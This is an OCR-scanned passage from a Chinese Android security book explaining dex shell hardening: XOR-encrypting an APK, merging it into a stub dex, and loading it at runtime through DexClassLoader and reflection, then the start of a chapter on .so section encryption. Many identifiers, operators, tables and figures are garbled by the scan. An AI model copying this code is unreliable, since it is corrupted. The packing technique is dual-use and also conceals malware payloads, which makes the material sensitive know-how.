System.arraycopy(payloadArray, 0, newdex, unShellDexLen, payloadLen);// 再 在 
dex #5 1 Д арк 的 内 容 

// 添加 解 充 数据 长 度 

System.arraycopy(intToByte(payloadLen), 0, newdex, totalLen-4, 4);// 最 后 4 为 
KE 

// 修改 DEX file size 文件 头 

fixFileSizeHeader (newdex); 

// ЁК DEX SHA1 文件 头 

fixSHAlHeader (newdex); 

// 修改 DEX CheckSum x ft 3- 


fixCheckSumHeader (newdex); 


String str - "force/classes.dex"; 

File file - new File(str); 

if (!file.exists()) { 
file.createNewFile(); 


实 框 部 分 其 实 焉 是 最 核心 的 工作 。 
1) 加 密 源 程序 apk 文 件 : 


// 以 二 进 制 形式 读 出 apk， 并 进行 加 密 处 理 // 对 源 apk 进行 加 密 操作 
byte[] payloadArray = encrpt(readFileBytes(payloadSrcFile)); 


加 密 算法 如 下 所 示 : 


// 直接 返回 数据 ， 读 者 可 以 添加 目 己 的 加 密 方法 
private static byte[] encrpt(byte[] srcdata)t 
for(int i = 0;i<srcdata.length;i+-+) { 
srcdata[i] = (byte) (OxFF ^ srcdata[i]); 
} 


return srcdata; 


对 每 个 字 忆 进行 异 或 一 下 即 可 。 


提示 : 这 里 是 为 了 简单 起 见 ， 就 用 了 很 简单 的 加 密 算法 。 其 实 为 了 增加 破解 难度 ， 应 该 使 用 更 高 效 的 加 密 算法 ， 同 时 最 好 将 
加 密 操作 放 到 native 层 去 做 。 


2) 合并 文件 : 将 加 密 之 后 的 apk 和 原 脱 过 dex 进行 合并 : 


int payloadLen = payloadArray.length; 

int unShellDexLen - unShellDexArray.length; 

int totalLen = payloadLen + unShellDexLen +4;// 多 出 4 字 节 是 存放 长 度 的 

byte[] newdex = new byte[totalLen]; // 申请 了 新 的 长 度 

/ / 添加 解 过 代码 

System.arraycopy (unShellDexArray, 0, newdex, 0, unShellDexLen);// #1 дех 内 容 
/ / 添加 加 密 后 的 解 过 数据 

// 再 在 dex #5 H Д apk 的 内 容 

System.arraycopy(payloadArray, 0, newdex, unShellDexLen, payloadLen); 


3) 在 文件 的 末尾 追加 源 程序 apk 的 长 度 : 


// 添加 解 充 数据 长 度 
System.arraycopy(intToByte(payloadLen), 0, newdex, totalLen-4, 4);// 最 后 4 为 长 度 


4) 修改 新 dex 文 件 的 文件 头 信息 : file size; sha1; check sum: 


// 修改 DEX file size ХА 
fixFileSizeHeader (newdex); 

// 修改 DEX ЅНА1 文件 头 
f1xSHAlHeader(newdex); 

// 修改 DEX CheckSum x ft š 
fixCheckSumHeader (newdex); 

具体 修改 可 以 参照 之 前 说 的 文件 头 格式 ， 修 改 指 定位 置 的 字 节 值 即 可 。 
这 里 还 需要 两 个 输入 文件 : 

源 apk 文 件 : ForceApkObj.apk 


- 脱 壳 程序 的 dex 文 件 : ForceApkObj.dex 


第 一 个 文件 都 知道 ， 束 是 上 面 的 源 程序 编译 之 后 的 apk 文 件 ， 第 二 个 文件 怎么 得 到 呢 ? 这 个 束 是 要 讲 到 的 第 三 个 项 目 : [йж 
程序 项 目 。 


З.Н: ReforceApk 


脱 过 项目 是 一 个 Android 项 目 ， 在 编译 之 后 ， 能 够 得 到 它 的 classes.dex 文 件 ， 然 后 修改 一 下 名 称 就 可 ， 如 图 13-6 所 示 。 


Gm ReforceApk [dynamic/ReforceApk] 
b mà Android 4.4W 
b mà Android Private Libraries 


4 JA src 
4 ҢА com.example.reforceapk 
> [Ñ MainActivityjava 255 15-8-12 下 午 8:51 jiangwei 
b ¿Ü ProxyApplicationjava 257 15-8-13 9:14 jiangwei 
b ДД Refinvokejava 257 15-8-13 下 午 9:14 jiangwei 
Ь E gen [Generated Java Files] 


b g dandis " 
b x res / Boc 的 dex 
Апйго4Мапд а 
国 classes.dex 
电 jarlist.cache 
$8, ReforceApk.apk 


£9 resources.ap_ 


图 13-6” 脱 沈 项 目 结 构图 
在 讲解 这 个 项 目 之 前 ， 先 来 了 解 一 下 这 个 脱 过 项 目的 工作 。 


1) 通过 反射 置换 android.app.ActivityThread 中 的 mClassLoader 是 加 载 解密 出 apk 的 DexClassLoader， 该 


DexClassLoader 一 方面 加 载 了 源 程 序 ， 另 一 方面 以 原 mClassLoader 为 父 节 点 ， 这 束 保 证 了 既 加 载 了 产程 序 义 没有 放弃 原先 加 载 
的 资源 与 系统 代码 。 


天 于 这 部 分 内 容 ， 不 了 解 的 可 以 看 一 下 ActivityThread.java 的 源码 : 


public fimal class ActivityThread í 
+" ghide */ 
public static final String TAG = "ActivityTIhread": 
private static final androtd.graphtcs.Bitmap.Config THUMBNAIL FORMAT = Bitmap.Config.RGB 565; 
static final boolean locallOGV = false; 
static final boolean DEBUG MESSAGES = false; 
/*" ghide */ 
public static final boolean DEBUG BROADCAST - false; 
private static final boolean DEBUG RESULTS = false; 
private static final boolean DEBUG BACKUP = false; 
public static final boolean DEBUG CONFIGURATION = false: 
private static final boolean DEBUG SERVICE = false; 
private static final boolean DEBUG MEMORY TRIM 一 false; 
private static final boolean DEBUG PROVIDER = false; 
private static final Longo MIN TIME BETWEEN GCS = 5*1000; 
private static final Pattern PATTERN SEMICOLON = Pattern.compils(":"); 
private static final int SQLITE MEM RELEASED EVENT LOG TAG = 758803; 
private static final int LOG ON PAUSE CALLED - 38821; 
private static final int LOG ON RESUME CALLED = 10022; 


static Contextimpi mSystemtontext = null; 
static IPackageManagen sPackageManager; 


final Appiicationlhread mAÁppThread = new ApplLicationIhread(); 
final Looper mLooper ~ Looper.myl onper() ; 
final H mH = new H(); 
final ArrayMapcIBimdenr, ActiívttyCLtentRecord» mActivitles 
= new ArrayMap«IBinder, ActivitytClientRecanrd*(); 
// List of new activities (via ActavityRecaord.nextldle)] that should 
ïi be reported when next we idle. 
ActivityClientRecord mNÑewñActivities = null; 
// Number of activities thal are currently visible on-sireen, 
int mMumVisibleArtivities ~ 8: 
final ArrcyMap«IBinder, Service» mServices 
= new ArrayMapcIBindenr, Senvice»(); 
AppHirmndÜUgta mBoundApplication; 


Profiler mProfiler; 
int míurlefaultiisplayDni: 


boolean mDernsityCampathkade 5 
коа Анана —Ó 


Tfi nal Arruyi T Tration> Адра ications 


2) 找到 源 程 序 的 Application ， 通 过 反射 建立 并 运行 。 


这 里 需要 注意 的 是 ， 现 在 是 加 载 一 个 完整 的 apk， 让 它 运 行 起 来 ， 一 个 apk 程 序 运 行 的 时 候 都 是 有 一 个 Application 对 象 的 ， 
这 个 也 是 一 个 程序 运行 之 后 的 全 局 类 。 所 以 必须 找到 解密 之 后 的 源 apk 的 Application 类 ， 运 行 它 的 onCreate 方 法 ， 这 样 源 apk 
才 开 始 它 的 运行 生命 周期 。 这 里 如 何 得 到 源 apk 的 Application 的 类 呢 ? 这 个 后 面 会 说 到 。 使 用 meta 标 签 进行 设置 。 


下 面 来 看 一 下 整体 的 流程 图 ， 如 图 13-7 所 示 。 


HE X. Application 中 的 


13510 А ХЕ X 25 In x на »  |attachBaseContext 方法 实现 


反射 设置 LoadedApk 中 加 
RRN KAB EXW RS 


获取 产程 序 中 的 


Application 名 称 目 定 义 Application 


onCreate 方法 实现 


反射 生成 正确 的 
Application 对 象 


反射 设置 ActivityThread 
中 的 Application 信息 


Activity 加 载 流 各 
il Tz Fr ШЕ. 1511 


图 13-7 ”加载 流程 
首先 来 看 一 下 具体 步骤 的 代码 实现 逻辑 : 


1) 得 到 脱 这 apk 中 的 dex 文 件 ， 然 后 从 这 个 文件 中 得 到 源 程序 apk， 进 行 解密 ， 最 后 进行 加 载 ， 代 码 如 下 : 


// 这 是 context 赋值 
@Override 
protected void attachBaseContext(Context base) { 
super.attachBaseContext (base); 
try { 
// 创建 两 个 文件 来 payload odex, payload lib, MAH, "D ХЕ ж 
File odex - this.getDir("payload odex", MODE PRIVATE); 
File libs - this.getDir("payload lib", MODE PRIVATE); 
odexPath = odex.getAbsolutePath(); 
libPath = libs.getAbsolutePath(); 
apkFileName = odex.getAbsolutePath() + "/payload.apk"; 
File dexFile - new File(apkFileName); 


Log.i("demo", "apk size:"-«dexFile.length()); 
if (!dexFile.exists()) 
{ 
dexFile.createNewFile(); // Ж рау1оаа odex 文件 夹 内 ,创建 payload.apk 


// 读 取 程序 classes.dex 文件 
byte[] dexdata = this.readDexFileFromApk(); 


// 分 离 出 解 充 后 的 apk 文件 已 用 于 动态 加 载 


this.splitPayLoadFromDex(dexdata); 


} 
// 配置 动态 加 载 环境 
Object currentActivityThread = RefInvoke.invokeStaticMethod( 


"android.app.ActivityThread", "currentActivityThread", 
new Class[] {}, new Obgject[] ()); 

String packageName = this.getPackageName();// 当前 apk 的 包 名 

ArrayMap mPackages - (ArrayMap) RefInvoke.getFieldOjbect( 
"android.app.ActivityThread", currentActivityThread, 
"mPackages"); 
WeakReference wr = (WeakReference) mPackages.get (packageName); 


// 创建 被 加 这 арк 的 DexclassLoader 对 象 ， 加 载 apk 内 的 类 和 本 地 代码 (с/с++ RÆ) 
DexClassLoader dLoader = new DexClassLoader(apkFileName, odexPath, 
libPath, (ClassLoader) RefInvoke.getFieldOjbect( 


"android.app.LoadedApk", wr.get(), "mClassLoader")); 
// 把 当前 进程 的 DexClassLoader 设置 成 了 被 加 这 apk 的 DexClassLoader 
ReflInvoke.setFieldOjbect("android.app.LoadedApk", "mClassLoader", 
wr.getí(), dLoader); 


Log.i("demo","classloader:"-«dLoader); 


try 
Object actObj = dLoader.loadClass("com.example.forceapkobj. 
MainActivity"); 
Log.i("demo", "actObj:"-cactObJj); 
)catch(Exception е){ 
Log.i("demo", "activity:"-«Log.getStackTraceString(e)); 


) catch (Exception e) { 
Log.i("demo", "error:"«Log.getStackTraceString(e)); 
e.printStackTrace(); 


这 里 需要 注意 的 一 个 问题 是 ， 需 要 找到 一 个 时 机 在 脱 壳 程 序 还 没有 运行 起 来 的 时 候 来 加 载 源 程序 的 apk， 执 行 它 的 
onCreate 方 法 ， 那 么 这 个 时 机 不 能 太 晚 ， 不 然 的 话 ， 就 是 运行 脱 壳 程序 ， 而 不 是 源 程序 了 。 m u. 
H&BlattachBaseContexth A, C frApplicationfJonCreate75; XA TBURUZ TAE 7, ЯАВ СЕТЕ р), 


2) 从 脱 壳 程序 apk 中 找到 源 程序 apk， 并 且 进 行 解密 操作 : 


// 创建 两 个 文件 夹 payload_odex、payload_lib， 私 有 的 ， 可 写 的 文件 目录 
File odex = this.getDir("payload odex", MODE PRIVATE); 

File libs - this.getDir("payload lib", MODE PRIVATE); 
odexPath = odex.getAbsolutePath(); 

libPath = libs.getAbsolutePath(); 

apkFileName = odex.getAbsolutePath() + "/payload.apk"; 

File dexFile - new File(apkFileName); 


Log.i("demo", "apk size:"-«dexFile.length()); 
if (!dexFile.exists()) 
( 
dexFile.createNewFile(); // Æ payload_odex 文件 夹 内 ,创建 payload.apk 


// З ЖЖ Ж classes.dex 文件 
byte[] dexdata = this.readDexFileFromApk(); 


// 分 离 出 解 充 后 的 apk 文件 已 用 于 动态 加 载 
this.splitPayLoadFromDex(dexdata); 


ЙО ie ЕХЕ BUBBLE DES EX IL, Кае аехЛд re Шай 


从 apk 中 获取 到 dex 文 件 : 


/** 
* 从 apk 包 里 面 获 取 dex 文件 内 容 (byte) 
х @return 
* @throws IOException 
Sy 
private byte[] readDexFileFromApk() throws IOException { 
ByteArrayOutputStream dexByteArrayOutputStream - new ByteArrayOutputStream(); 
ZiplnputStream localZiplInputStream = new ZiplInputStream( 
new BufferedInputStream(new FilelnputStream( 
this.getApplicationInfo().sourceDir))); 
while (true) { 
ZipEntry localZipEntry - localZipInputStream.getNextEntry(); 


1f (localZipEntry == null) í 
localZipInputStream.close(); 
break; 

if (localZipEntry.getName().equals("classes.dex")) { 


byte[] arrayvOfByte = new byte [1024]; 
while (true) { 
int 1 = localZipInputStream.read(arrayOfByte); 
IL {1 == —1) 
break; 
dexByteArrayOutputStream.write(arrayOfByte, 0, 1i); 


} 
localZiplInputStream.closeEntry(); 


} 
localzipInputStream.close(); 
return dexByteArrayOutputStream.toByteArray(); 


其 实 束 是 解压 apk 文 件 ， 直 接 得 到 dex 文 件 即 可 。 


从 胶 过 Dex 中 得 到 源 apk 文 件 : 


/** 
к xd Jus apk 文件 、so 文件 
* (àparam data 
х (throws IOException 
eit d 
private void splitPayLoadFromDex(byte[] apkdata) throws IOException { 
int ablen - apkdata.length; 
// Wm s арк KEREKERE, x Sm ge Ep HK EF BN EL Н] Df (И, 
byte[] dexlen = new byte[4]; 
System.arraycopy(apkdata, ablen - 4, dexlen, 0, 4); 


ByteArraylnputStream bais = new ByteArraylnputStream(dexlen); 
DatalnputStream in = new DatalnputStream(bais); 

int readInt = in.readInt(); 
System.out.println(Integer.toHexString(readInt)); 

byte[] newdex = new byte[readInt]; 

// 把 被 加 这 арк FEX 8| newdex 中 

System.arraycopy(apkdata, ablen - 4 - readInt, newdex, 0, readInt); 


// 这 里 应 该 加 上 对 于 apk 的 解密 操作 ， 老 加 这 是 加 密 处 理 的 话 ? 


// 对 源 程序 арк 进行 解密 


newdex = decrypt (newdex) ; 


// S A apk 文件 
File file = new File(apkFileName); 
ER А 
FileOutputStream localFileOutputStream = new FileOutputStream(file); 
localFileOutputStream.write(newdex); 
localFileOutputStream.close(); 
) catch (IOException locallOException) { 
throw new RuntimeException(locallOException); 


/ / 分 析 被 加 充 的 apk 文件 
ZipInputStream localZipInputStream = new ZipInputStream( 
new BufferedInputStream(new FileInputStream(file))); 
while (true) ( 
// 不 了 解 这 个 是 否 也 遍历 子 目 录 ， 看 样子 应 该 是 遍历 的 
ZipEntry localZipEntry = localZipInputStream.getNextEntry(); 


it (localZzipEnttry == null) { 
localziplInputStream.close(); 
break; 


} 
// K Hj us apk 用 到 的 so 文件 ， 放 到 libPath Ф (data/data/ 8 Z /payload lib) 
String name = localZipEntry.getName(); 
if (name.startsWith("lib/") && mame.endsWith(".so")) { 
Flle storeFile = пем File(libPath + "/" 
+ name.substring (name.lastIndexOf ('/'))); 
storeFile.createNewFile(); 
FileOutputStream fos = new FileOutputStream(storeFile); 
byte[] arrayOfByte - new byte[1024]; 
while (true) { 
int 1 = localZipInputStream.read(arrayOfByte); 
LI TI == 1) 
break; 
fos.write(arrayOfByte, 0, 1); 
} 
fos.flush(); 
fos.close(); 
} 
localZipInputStream.closeEntry(); 
J 


localZipInputStream.close(); 


解密 源 程序 apk: 


// 直接 返回 数据 ， 读 者 可 以 添加 自己 的 解密 方法 
private byte[] decrypt (byte[] srcdata) í 
for(int i20;i«srcdata.length;i-«-«)í 
srcdata[i] = (byte) (OxFF ^ srcdata[i]l); 
} 


return srcdata; 


解密 算法 和 加 密 算法 是 一 致 的 。 


3) 加 载 解密 之 后 的 源 程序 apk: 


// 配置 动态 加 载 环 境 
Object currentActivityThread = ReflInvoke.invokeStaticMethod( 


"android.app.ActivityThread", "currentActivityThread", 
new Class[] (), new Obgject[] ()); 

String packageName = this.getPackageName();// 当前 арк 的 包 名 

ArrayMap mPackages = (ArrayMap) RefInvoke.getFieldOjbect( 
"android.app.ActivityThread", currentActivityThread, 
"mPackages"); 

WeakReference wr = (WeakReference) mPackages.get(packageName); 


// 创建 被 加 充 apk 的 DexClassLoader 对 象 ， 加 载 apk 内 的 类 和 本 地 代码 (c/co RÆ) 
DexClassLoader dLoader = new DexClassLoader(apkFileName, odexPath, 
libPath, (ClassLoader) RefInvoke.getFieldOjbect( 


"android.app.LoadedApk", wr.get(), "mClassLoader")); 
// 把 当前 进程 的 DexClassLoader 设置 成 了 被 加 过 apkDexClassLoader 
RefInvoke.setFieldOjbect ("android.app.LoadedApk", "mClassLoader", 
wr.get(), dLoader); 


Log.i("demo","classloader:"-«dLoader); 


tryt 
Object actObj = dLoader.loadClass("com.example.forceapkobj.MainActivity"); 
Log.i("demo", "actObj:"-cactObJj); 

)catch(Exception е){ 
Log.i("demo", "activity:"-«Log.getStackTraceString(e)); 


4) 找到 源 程序 的 Application 程 序 ， 让 其 运行 : 


QOverride 
public void onCreate() { 


( 
//loadResources(apkFileName); 


Log.i("demo", "onCreate"); 


// 如 果 源 应 用 配置 有 Арр1ісііоп 对 象 ， 则 替换 为 源 应 用 Applicaiton, LED ЕЛЕ mE, 


String appClassName = null; 
y i 
ApplicationInfo ai = this.getPackageManager() 
.getApplicationInfo (this.getPackageName (), 
PackageManager.GET META DATA); 
Bundle bundle = ai.metaData; 


if (bundle != null && bundle.containsKey ("APPLICATION CLASS NAME")) 


//className 是 配置 在 xml 文件 中 的 。 


appClassName = bundle.getString("APPLICATION CLASS, NAME"); 
) else ( 

Log.i("demo", "have no application class name"); 

return; 
} 

} catch (NameNotFoundException е) { 

Log.i("demo", "error:"-«Log.getStackTraceString(e)); 
e.printStackTrace(); 

J 

// 有 值 的 话 调 用 该 Applicaiton 

Object currentActivityThread = RefInvoke.invokeStaticMethod( 
"android.app.ActivityThread", "currentActivityThread", 
new Class[] í), new Obgject[] ()); 

Object mBoundApplication = RefInvoke.getFieldOjbect( 
"android.app.ActivityThread", currentActivityThread, 
"mBoundApplication"); 

Object loadedApklInfo = RefInvoke.getFieldOjbect( 
"android.app.ActivityThreadS$AppBindData", 
mBoundApplication, "info"); 

// 把 当前 进程 的 mApplication 设置 成 了 null 

Reflnvoke.setFieldOjbect("android.app.LoadedApk", "mApplication", 
loadedApkInfo, null); 

Object oldApplication = RefInvoke.getFieldOjbect( 
"android.app.ActivityThread", currentActivityThreagd, 
"mInitialApplication"); 

//http://www.codeceo.com/article/android-context.html 

ArrayList«Application» mAllApplications = (ArrayList«Application») 

ReflInvoke 
.getFieldOjbect("android.app.ActivityThread", 
currentActivityThread, "mAllApplications"); 
mAllApplications.remove (oldApplication);// 删除 oldApplication 


Applicationinfo appinfo In LoadedApk = (Applicationinfo) RefInvoke 
.getFieldOjbect("android.app.LoadedApk", loadedApkiInfo, 
"mApplicationInfo"); 
ApplicationlInfo appinfo In AppBindData = (ApplicationInfo) RefInvoke 


.getFieldOjbect("android.app.ActivityThreadSAppBindData", 
mBoundApplication, "appInfo"); 
appinfo In LoadedApk.className - appClassName; 
appinfo In AppBindData.className - appClassName; 


Application app = (Application) RefInvoke.invokeMethod( 
"android.app.LoadedApk", "makeApplication", loadedApkInfo, 
new Class[] ( boolean.class, Instrumentation.class }, 


new Object[] { false, null });// 执 行 makeapplication (false,null) 
Reflnvoke.setFieldOjbect("android.app.ActivityThread", 
"mInitialApplication", currentActivityThread, app); 


ArrayMap mProviderMap - (ArrayMap) RefInvoke.getFieldOjbect( 
"android.app.ActivityThread", currentActivityThreagd, 
"mProviderMap"); 

Iterator it - mProviderMap.values().iterator(); 

while (it.hasNext()) { 


Object providerClientRecord - it.next(); 

Object localProvider - RefInvoke.getFieldOjbect( 
"android.app.ActivityThreadSProviderClientRecord", 
providerClientRecord, "mLocalProvider"); 


ReflInvoke.setFieldOjbect("android.content.ContentProvider", 
"mContext", localProvider, app); 


Log.i("demo", "app:"-«app); 


app.onCreate(); 


直接 在 脱 壳 的 Application 中 的 onCreate 方 法 中 进行 束 可 以 了 。 这 里 还 可 以 看 到 是 通过 AndroidManifest.xml 中 的 meta 标 
签 获 取 源 程序 apk 中 的 Application 对 象 的 。 


下 面 来 看 一 下 AndoridManifest.xml 文 件 中 的 内 容 ， 如 下 所 示 : 


<application 
android:allowBackup="true" 
android:icon="@drawable/ic_launcher" 
android:label="@string/app_name" 
android:name="com.example.reforceapk.proxyApplication"> 


<meta-data android:name="APPLICATION_CLASS_NAME"android:value="com.example. 
forceapkobj.MyApplication"/» 


在 这 里 定义 了 源 程序 apk 的 Application 类 名 。 


提示 : ЖЕ 下 载 为 http://download.csdn.net/detail/jiangwei0910410003/9102741 


13.3 ”运行 项 目 
上 节 介 绍 了 这 三 个 项 目 ， 下 面 束 来 看 看 如 何 运 行 吧 。 


第 一 步 : 得 到 源 程序 apk 文 件 和 脱 壳 程 序 的 dex 文 件 


运行 源 程 序 项 目 和 脱 壳 程序 项 目 ， 得 到 源 程序 apk 文 件 和 脱 壳 程序 的 dex 文 件 ， 如 图 13-8 所 示 。 


а Ga ReforceApk [dynamic/ReforceApk] 
> mà Android 4.4W 
› ж Android Private Libraries 


а 22 ForceApkObj 4 VB src 
» GB src 4 ЦА com.example.reforceapk 
» Bl Android 4.4W > [fj MainActivityjava 255 15-8-12 F#8:51 jiangwei 
» NÀ Android Private Libraries > l|] ProxyApplicationjava 257 15-8-13 F#F9:14 jiangwei 
> 08 gen [Generated Java Files] M I йй. Beflovokejava 227 15-8-13 下 午 9:14 jiangwei 
C. assets > 4 деп [Generated Јама Files] 
4 [m bin: "d PES 
> E> dexedLibs 4 Ex bin 
T res > 25 dexedLibs 
21) AndroidManifest.xml i Cx deis 
Ei classes.dex Android Manifest.xml 


HPE ForceApkObj.apk = == 

E Jarlist.cache gk jarlist.cache 
R.txt {A ReforceApk.apk 
E| resources.ap 5$ resources.ap 


图 13-8 项 目 结 构图 
之 后 得 到 这 两 个 文件 (记得 将 classes.dex 文 件 改 名 ForceApkObj.dex) ， 然 后 使 用 加 这 程 序 进行 加 过， 如 图 13-9 所 示 。 


这 里 的 ForceApkObj.apk 文 件 和 ForceApkObj.dex 文 件 是 输入 文件 ， 输 出 的 是 classes.dex 文 件 。 
第 二 步 : 奉 换 脱 壳 程序 中 的 classes.dex 文 件 


在 第 一 步 中 得 到 加 壳 之 后 的 classes.dex 文 件 之 后 ， 并 且 在 第 一 步 运行 脱 过 项 目的 时 候 得 到 一 个 ReforceApk.apk 文 件 ， 这 时 
候 使 用 解压 缩 软件 进行 蔡 换 ， 如 图 13-10 所 示 。 


Р | ГУ DexShel ITools 


E SE src 


rH com.example.reforceapl 
ү ple.ret pk 


> АЙ] mymain.java 
> mA JRE System Library [JavaSE-1.7] 


Л force 


classes.dex 


图 13-9 ”加 上 这 程序 


LR K MEM A K | R D D Ь K E K Ь RA R u S KT ® 
| 


f, ReforceApk.apk - ZIP 压缩 文件 , 解 包 大 小 为 848,74€ 


= 


4» META-INF 

ILL. ЖЕЛЕНИ OK 了 
РЛ AndroidManifest.xml 

В| class es,dex 


kl resources.arsc 


图 13-10 压缩 软件 查看 apk 内 容 


第 三 步 : 得 到 替换 之 后 的 ReforceApk.apk 文 件 


这 个 文件 因为 被 修改 了 ， 所 以 需要 重新 对 它 签名 ， 不 然 运行 也 是 报错 的 。 这 里 可 以 使 用 jarsigner 工 具 对 apk 进 行 重 签 名 : 


jarsigner -verbose -keystore forceapk -storepass 123456 -keypass 123456 -sigfile 


CERT -digestalg SHA1L -sigalg MDb5withRSA -signedjar ReforceApk des.apk 


ReforceApk.apk jiangwei 
del ReforceApk.apk 


这 里 最 主要 的 命令 丈 是 中 间 的 一 条 签名 的 命令 ， 关 于 命令 的 参数 说 明 如 下 : 


jarsigner -verbose -keystore 签名 文件 -storepass 密码  -keypass alias 的 密 
-sigfile CERT -digestalg SHA1 -sigalg MD5withRSA 签名 后 的 文件 签名 前 的 apk alias 名 称 


例如 : 


Jarsigner -verbose -keystore forceapk -storepass 123456 -keypass 123456 -sigfile 
CERT -digestalg SHA1 -sigalg MD5withRSA -signedjar ReforceApk des.apk 
ReforceApk src.apk jiangwei 


签名 文件 的 密码 : 123456 
alais 的 密码 . 123456 


码 


那么 通过 上 面 的 三 个 步骤 之 后 得 到 一 个 签名 之 后 的 最 终 文 件 : ReforceApk_des.apk, = арк, AmA, 8 
13-11 所 示 。 


图 13-11 运行 效果 图 


这 个 时 候 再 去 反 编 译 一 下 源 程 序 apk， 如 下 所 示 (这 个 文件 是 脱 过 出 来 的 payload.apk， 看 ReforeceApk 中 的 代码 就 知道 
的 位 置 了 ) 


C:\UsersNi\DesktopNhndroid 友 编译 \hndroid 友 编译 \dex2jar-B.-B9.9.15>dex2jar payload.dex 

this cmd is deprecated, use the d2j-dex2jar if possible 

dex2jar version: translator-0.0.9.15 

dex2jar payload.dex -> payload dex2Jjar.Jjar 

. while process file: [pavyload.dex]1l 

.. dex-translator not support translate an odex file, please refere smali http://code.google 
Done. 


C:NJsers\i\DesktopMndroid 反 编译 Mndroid 反 编译 Mex2jar-8.0.9.15>， 
上 友 现 dex 文 件 格式 是 不 正确 的 。 襄 明 加 固 是 成 功 的 。 
已 结 遇 到 的 问题 如 下 : 
. 研究 的 过 程 中 遇 到 签名 不 正确 的 地 方 ， 开 始 的 时 候 替 换 dex 文 件 ， 就 直接 运行 了 abk， 但 是 总 是 提示 签名 不 正确 。 


‚ 运行 的 过 程 中 说 找 不 到 源 程 序 中 的 Activity， 需 要 在 脱党 程序 中 的 AndtoidManifestxml 中 查看 一 下 源 程序 中 的 Activity， 如 下 
所 示 : 


<activity 
android:name-"com.exampLle.forceapkobj .MainActivity" 
android:label-"Gstring/app пате" > 
«intent-filter» 
«action android:name-"android.intent.action.MAIN" /» 
«category android:namez"android.intent.category.LAUNCHER" /> 
«/intent-filter» 
«/activity» 


«activity 
android:namez"com.example.forceapkobj . SubActivity"»«/activity» 


通过 上 面 的 过 程 可 以 看 到 ， 关 于 apk 加 固 的 工作 还 是 挺 复杂 的 ， 涉 及 的 东西 也 挺 多 ， 下 面 就 来 总 结 一 下 。 
ЛО: 

. 任务 : 对 源 程序 apKk 进 行 加 客 ， 合 并 脱党 程序 的 dex 文 件 ， 然 后 输入 一 个 加 沉 之 后 的 dex 文 件 。 

‚зї: ШЕГИ, Жа. 

. 技术 点 对 dex 文 件 格式 的 解析 。 

脱 壳 程序 : 

. 任务 : 获取 源 程序 4pk， 进 行 解密 ， 然 后 动态 加 载 进 来 ， 运 行程 序 。 

. 语言 : Android 项 目 (Java) . 


` 技术 点 : 如 何 从 apk 中 获取 dex 文 件 ， 9) о арк, 使 用 反射 运行 Application。 


== 
134 ANE 
Android 中 的 apk 反 编译 可 能 是 每 个 开发 者 都 会 经 历 的 事 ,， 但 是 源 程序 的 开发 者 对 apk 加 固 应 运 而 生 ， 即 使 是 加 固 ， 也 还 是 做 不 


到 那么 安全 ， 现 在 网 上 也 有 很 多 文章 在 解析 菜品 牌 加固 的 原理 了 ， 而 且 有 人 破解 成 功 了 ， 那 么 加 固 还 不 是 怎么 安全 。 最 后 一 句 
话 : 逆向 和 加 固 是 一 个 永 不 停 上 站 的 战 搜 。 


第 14 章 ”Android 中 的 so 加 固原 理 


前 一 章 已 经 介绍 了 Android 中 dex 加 固原 理 ， 虽 然 dex 加 固 是 一 种 防护 策略 ， 但 是 它 仍 然 存 在 被 破解 的 风险 ， 所 以 本 章 就 来 介绍 
另外 一 种 加 固 方 法 ， 对 so 文件 的 加 固 防护 ， 这 种 加 固 方式 和 dex 加 固 方 式 来 比较 的 话 ， 安 全 性 会 更 高 ， 因 为 native 层 的 代码 会 比较 
难以 破解 和 阅读 。 


14.1 ”基于 对 so 中 的 section 加 密实 现 so 加 国 


在 前 面 章节 中 已 经 详细 介绍 了 so 文件 格式 ， 有 了 这 个 知识 作为 基础 ， 下 面 融 来 讲解 如 何 对 so 文件 进行 加 密 。 


14.1.1 技术 原理 


加 密 过 程 : 找到 so 文件 中 一 个 section 的 起 始 地 址 和 大 小 惑 可 以 对 这 个 section 进 行 加 密 了 。 


解密 过 程 : 因为 对 section 进 行 加 密 之 后 ， 肯 定 需 要 解密 ， 不 然 运行 肯定 报错 ， 这 里 的 重点 是 什么 时 候 去 进行 解密 。 对 于 一 
个 so 文件 ， 当 被 加 载 到 程序 之 后 ， 在 运行 程序 之 前 可 以 从 哪个 时 间 点 来 突破 ? 这 里 束 需 要 一 个 知识 点 : 
attribute  ( (constructor) ) ; 关于 这 个 属性 的 用 法 这 里 束 不 做 介绍 了 ， 网 上 有 相关 资料 ， 它 的 作用 是 优先 于 main 方 法 之 
前 执行 ， 类 似 于 Java 中 的 构造 函数 ， 当 然 C+ + 中 的 构造 函数 是 基于 这 个 属性 实现 的 ， 在 之 前 第 4 章 介绍 ELF 文 件 格式 的 时 候 ， 有 
两 个 section 会 引起 注意 ， 如 图 14-1 所 示 。 


НЕ al 


pA: 

[Nr] Name Tupe fiddr Of f Size ES Flg Lk Inf А1 
[ 81 NULL Йа HOOOHOO поввов вө 8 ga 8 
[ 1] .dunsyum DYNSYM 00000114 000114 800804c8 10 a 2 1 4 
[ 21 .dunstr STRTARB 0600000544 000544 8805a6 00 ñ B B i 
[ 31 .hash HASH BagBBb7?7c 0880b7c 000244 @4 a 1 а 4 
І 4] .rel.dun REL 00000dc0 aBBdca 000D050 A8 а 1 8 4 
[ 51 .rel.plt REL 900808080e180 0080e18 808080a8 88 a 1 6 4 
[ 61 .plt PROGBITS 9008080eb8 B8808eb8 8001180 OA АХ 日 B 4 
[ 7] .text PROGBITS 0000DBfc8S aBBfc8 001848 OG hk A а 4 
[ 81 .ARM.extab PROGBITS 000028aB 0028a0 000048 ВВ ñ a8 B 4 
[ 9] .ARM.exidx ARM_EXI DX 000028e8 В028е8 880008 808 AL 7 8 4 
[ PROGBITS 000029c0 @Й29сй ИЙЙ1е& 01 AME A ð 1 

FINI. RRRAV 9008003e'780 0802e780 888080808 ӨЙ WA 日 8 4 

INIT ЯККА? 008003e78 O02e78 88800808 ИЙ WA 日 а 4 

DYNAMIC 00003e80 802e880 8080188 88 WA 2 а 4 

PROGBITS 00003f80 002f80 000080 BB WA A 8 4 

PROGBITS 908040080 0030080 0800004 ИЙ WA A а 4 

NOBITS 9gg0004004 8003004 8O000080 HO WA ө B i 
[171 .comnent PROGBITS 909000009 003004 80800026 801 MS A B 1 
[18] .note.gnu.gold-ve NOTE 0600000000 80302c 88001c 00 И 8 4 
[191 .ARM.attributes ARM_ATTRIBUTES 88800808808 003048 8808082d вө 8 B i 
[201 .shstrtab STRIARB 00000D000 0803075 000b8 AA @ 8 1 

图 14-1 ELEF 文 件 的 段 信 息 


